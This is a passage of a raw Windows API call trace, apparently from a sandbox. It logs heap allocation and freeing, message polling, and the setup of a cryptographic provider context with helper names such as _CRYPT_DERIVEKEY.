dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.310] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0224.311] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0224.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0224.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0224.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0224.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.311] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0224.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0224.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0224.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0224.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0224.315] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0224.315] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.315] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0224.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0224.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0224.316] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0224.316] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.316] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0224.316] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0224.316] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0224.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0224.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0224.317] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.317] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0224.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0224.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0224.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0224.318] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0224.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0224.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0224.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0224.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0224.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0224.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0224.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0224.320] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0224.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0224.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0224.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0224.320] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0224.321] RtlAllocateHeap 